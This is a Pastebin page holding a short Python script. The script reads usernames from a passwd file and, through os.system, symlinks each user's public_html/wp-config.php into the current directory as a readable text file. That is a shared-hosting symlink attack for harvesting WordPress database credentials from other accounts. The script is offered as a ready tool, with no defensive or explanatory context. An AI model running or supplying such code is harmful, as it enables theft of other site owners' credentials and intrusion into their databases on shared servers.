Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # -*- coding: utf-8 -*-
- import os
- passwd = open("passwd.txt").read()
- for i in passwd.splitlines():
- x = i.split(":")
- user = x[0]
- os.system("ln -s /home/"+user+"/public_html/wp-config.php "+user+"-Wordpress.txt")
- print("Dah selesai lur")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement